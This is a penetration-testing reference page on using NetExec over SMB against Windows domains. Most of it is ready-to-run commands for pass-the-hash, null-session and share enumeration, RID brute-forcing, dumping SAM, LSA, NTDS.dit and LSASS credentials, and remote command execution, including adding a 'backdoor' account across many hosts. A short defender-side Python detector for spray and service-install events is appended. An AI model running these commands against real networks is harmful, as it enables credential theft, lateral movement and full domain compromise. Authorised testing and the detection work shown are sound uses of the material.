# SMB Operations with NetExec
## Overview
SMB (445/TCP) is NetExec's primary and most feature-rich protocol. It supports credential validation, share and user enumeration, hash dumping, pass-the-hash authentication, remote command execution, and a large library of modules. Most internal pentest workflows start with SMB operations.
## Prerequisites
- Network access to target SMB port (445/TCP)
- Valid domain or local credentials (unless testing null/guest sessions)
- NetExec installed (`pip install netexec`)
## Credential Validation
The most basic operation — test whether a username/password combination is valid on a target:
```bash
# Single target, single credential
netexec smb 10.10.10.5 -u administrator -p 'Passw0rd!'
# [+] → valid credentials (Pwn3d! if local admin)
# [-] → invalid credentials

# Domain context
netexec smb 10.10.10.5 -u user -p pass -d domain.local

# Pass-the-hash (NTLM)
netexec smb 10.10.10.5 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99'
# -H → LM:NT hash pair (LM can be all zeros)

# File-based credential lists
netexec smb 10.10.10.5 -u users.txt -p passwords.txt
netexec smb 10.10.10.5 -u users.txt -H hashes.txt
```
Interpreting output:
- `[+]` green — valid credentials, non-admin
- `[+]` green + `(Pwn3d!)` — valid credentials with local admin rights
- `[-]` red — invalid credentials
- `[*]` yellow — informational
## Null and Guest Sessions
Test whether the target allows unauthenticated SMB access:
```bash
# Null session (empty credentials)
netexec smb 10.10.10.5 -u '' -p '' --shares
# If shares are listed → null session allowed

# Guest account
netexec smb 10.10.10.5 -u guest -p '' --shares
# If shares are listed → guest access enabled

# Check SMB signing (critical for relay attacks); the signing status is
# printed in the default per-host banner line, no module required
netexec smb 10.10.10.0/24 -u '' -p ''
# signing:False → target does NOT require SMB signing (relay-able)
# signing:True → target requires SMB signing (cannot relay to it)
```
## Share Enumeration
```bash
# List all shares
netexec smb 10.10.10.5 -u user -p pass --shares
# Shows: share name, permissions (READ/WRITE), description

# Recursive share spidering (find interesting files)
netexec smb 10.10.10.5 -u user -p pass -M spider_plus
# Output saved to: ~/.netexec/workspaces/<workspace>/spider_plus/
# Finds: .kdbx, .vmdk, .ova, backup files, configs, scripts, credentials

# Spider with custom pattern
netexec smb 10.10.10.5 -u user -p pass -M spider_plus -o PATTERN='*.xml,*.config,*.ini,*.bak,*.ps1,*.vbs,*.bat'
```
## User and Group Enumeration
```bash
# Enumerate domain users via SAMR (requires valid credentials)
netexec smb 10.10.10.5 -u user -p pass --users
# Lists: username, RID, full name

# RID brute-force (enumerate ALL users by cycling RIDs)
netexec smb 10.10.10.5 -u user -p pass --rid-brute
# RID 500   → Administrator (built-in)
# RID 501   → Guest
# RID 502   → krbtgt
# RID 1000+ → Domain users

# RID brute with range limit
netexec smb 10.10.10.5 -u user -p pass --rid-brute 5000
# Enumerates RIDs 500–5000

# Enumerate local groups
netexec smb 10.10.10.5 -u user -p pass --local-groups
# Shows: Administrators, Remote Desktop Users, etc. with members

# Enumerate domain groups (via SAMR)
netexec smb 10.10.10.5 -u user -p pass --groups
```
## Session and Logged-On User Enumeration
```bash
# Active SMB sessions (who's connected to this host)
netexec smb 10.10.10.5 -u user -p pass --sessions
# Shows: source IP, username, authentication method

# Currently logged-on users (interactive sessions)
netexec smb 10.10.10.5 -u user -p pass --loggedon-users
# Shows: username, session type (interactive/remote/network)

# Combine: find where Domain Admins are logged on
netexec smb 10.10.10.0/24 -u user -p pass --loggedon-users | grep -i "domain admin"
```
## Credential and Hash Dumping
```bash
# Dump local SAM database (local account hashes)
netexec smb 10.10.10.5 -u admin_user -p pass --sam
# Requires: local admin or SYSTEM equivalent
# Output format: username:RID:LM_hash:NT_hash:::

# Dump LSA secrets (cached credentials, service account passwords)
netexec smb 10.10.10.5 -u admin_user -p pass --lsa
# Output: cached domain credentials, DPAPI keys, service account secrets

# Dump NTDS.dit (full Active Directory database)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
# Requires: Domain Admin or equivalent (Replicating Directory Changes)
# Output: every domain user hash, group membership, trust info

# Dump DPAPI master keys
netexec smb 10.10.10.5 -u admin_user -p pass --dpapi
# Used to decrypt: saved browser passwords, scheduled task credentials, etc.

# Remote LSASS dump via lsassy module (comsvcs.dll method)
netexec smb 10.10.10.5 -u admin_user -p pass -M lsassy
# Dumps LSASS process memory → extracts credentials offline
# Output saved to: ~/.netexec/workspaces/<workspace>/lsassy/
```
## Pass-the-Hash
Authenticate using NTLM hashes without knowing the plaintext password:
```bash
# Pass-the-hash with full LM:NT pair
netexec smb 10.10.10.5 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99'

# Pass-the-hash with NT hash only (LM set to blank)
netexec smb 10.10.10.5 -u administrator -H ':5f4dcc3b5aa765d61d8327deb882cf99'

# Spray a hash across a subnet
netexec smb 10.10.10.0/24 -u administrator -H ':NTHASH' --continue-on-success

# Pass-the-hash with local auth
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --local-auth
```
## Command Execution
```bash
# Execute a single command via SMB service manager
netexec smb 10.10.10.5 -u admin -p pass -x 'whoami'
# -x → cmd.exe command (writes and executes a service binary)

# Execute PowerShell command
netexec smb 10.10.10.5 -u admin -p pass -X 'Get-Process | Select-Object Name,Id'

# Execute command on multiple targets
netexec smb targets.txt -u admin -p pass -x 'net user backdoor P@ssw0rd! /add'

# Execute with pass-the-hash
netexec smb 10.10.10.5 -u admin -H ':NTHASH' -x 'whoami /all'
```
## SMB Signing and Relay Attack Surface
```bash
# Check SMB signing status across a subnet (shown in the per-host banner line)
netexec smb 10.10.10.0/24 -u '' -p ''
# signing:False → relay target candidate
# signing:True → cannot relay SMB to this host

# Check WebClient (WebDAV) service status: needed for coercion → relay
netexec smb 10.10.10.0/24 -u '' -p '' -M webdav
# WebClient service running → can coerce WebDAV auth and relay to LDAP/SMB

# Combine: signing status from the banner plus WebClient status from the module
netexec smb 10.10.10.0/24 -u '' -p '' -M webdav
```
## Password Policy Enumeration
```bash
# Retrieve domain password policy
netexec smb 10.10.10.5 -u user -p pass --password-policy
# Shows: minimum length, lockout threshold, lockout duration, history, max age
# Critical for planning password spraying campaigns
```
## Disk and System Information
```bash
# List disk drives and free space
netexec smb 10.10.10.5 -u user -p pass --disks

# Check if target is a Domain Controller
netexec smb 10.10.10.5 -u user -p pass
# Output includes: "Domain Controller" indicator
```
## Common Pitfalls
- ⚠️ SMB signing blocks relay: if `signing:True`, you cannot relay NTLM authentication to this host via SMB. Target LDAP or HTTP instead.
- ⚠️ Local admin required for dumping: SAM/LSA/NTDS dumping requires administrative privileges. Validate with the `(Pwn3d!)` indicator first.
- ⚠️ WinRM vs SMB execution: `-x` on SMB uses service creation (requires admin). For non-admin command execution, use the WinRM protocol instead.
- ⚠️ RID brute lockouts: RID brute does NOT cause account lockouts (it queries SAMR rather than authenticating as each RID). Safe to run.
- ⚠️ Null session limitations: modern Windows (Server 2016+) blocks null session SMB enumeration by default. You'll need at least a low-privileged domain credential.
## OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | Single failed login event (4625) per attempt |
| Share enumeration | Low | SMB tree connect logs |
| RID brute | Low | SAMR queries, no login events |
| spider_plus | Medium | High SMB file listing traffic |
| SAM/LSA dump | High | Service creation, file writes to disk |
| lsassy | High | LSASS process access, EDR trigger |
| Command execution (-x) | Medium | Service creation (7045), process creation (4688) |
| Password spraying | Medium | Multiple 4625 events across accounts |
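As an added, defender-side example (not part of NetExec or of this page's original content), the following Python flags two of the artifacts listed in the table above over constructed sample events: a password spray (many 4625 failures for distinct accounts from one source inside a short window) and a 7045 service install whose image path launches a shell, the footprint of service-based `-x` execution. The event field names and the thresholds are simplified assumptions, not real EVTX schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample events (simplified field names, not real EVTX output)
SAMPLE_EVENTS = [
    # five failed logons (4625) for five different accounts from one source in 4 s
    {"id": 4625, "ts": "2024-05-01T10:00:01", "src": "10.10.10.99", "user": "alice"},
    {"id": 4625, "ts": "2024-05-01T10:00:02", "src": "10.10.10.99", "user": "bob"},
    {"id": 4625, "ts": "2024-05-01T10:00:03", "src": "10.10.10.99", "user": "carol"},
    {"id": 4625, "ts": "2024-05-01T10:00:04", "src": "10.10.10.99", "user": "dave"},
    {"id": 4625, "ts": "2024-05-01T10:00:05", "src": "10.10.10.99", "user": "erin"},
    # a single mistyped password from a workstation: not a spray
    {"id": 4625, "ts": "2024-05-01T11:30:00", "src": "10.10.10.7", "user": "alice"},
    # service installs (7045): one runs a shell, one is an ordinary agent install
    {"id": 7045, "ts": "2024-05-01T10:05:00", "src": "WS01", "service": "svc_x7k2",
     "image": "cmd.exe /Q /c whoami"},
    {"id": 7045, "ts": "2024-05-01T09:00:00", "src": "WS02", "service": "VendorAgent",
     "image": r"C:\Program Files\Vendor\agent.exe"},
]

SPRAY_MIN_ACCOUNTS = 5               # distinct accounts from one source ...
SPRAY_WINDOW = timedelta(minutes=5)  # ... inside this sliding window
SHELL_RE = re.compile(r"(cmd\.exe|powershell|%COMSPEC%)", re.I)


def detect_spray(events, min_accounts=SPRAY_MIN_ACCOUNTS, window=SPRAY_WINDOW):
    """Return {source: distinct_accounts} for sources whose 4625 events cover
    at least min_accounts different usernames within one window."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[src] = len(users)
                break
    return hits


def detect_service_exec(events):
    """Return 7045 events whose ImagePath launches a shell or interpreter."""
    return [e for e in events if e["id"] == 7045 and SHELL_RE.search(e["image"])]
```

On the sample data the spray detector reports only 10.10.10.99, and the service check returns only the `svc_x7k2` install; tune the window and threshold to the lockout policy of the environment being monitored.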
## Post-Exploitation Value
- Valid credentials → lateral movement, further enumeration
- Share access → file exfiltration, configuration discovery
- User list → password spraying targets, Kerberoasting candidates
- SAM hashes → offline cracking, pass-the-hash
- LSA secrets → cached domain credentials, service account passwords
- NTDS dump → complete domain compromise evidence
- SMB signing:False → NTLM relay attack surface
## Cross-References
- LDAP Operations — Complementary domain enumeration
- Password Spraying — Spraying strategies using SMB
- Credential Dumping — Detailed dump workflows
- AD Attacks via NetExec — Full attack chains
- SMB Enumeration — Manual SMB enumeration techniques
- NTLM Theft & Relay — Relay attack details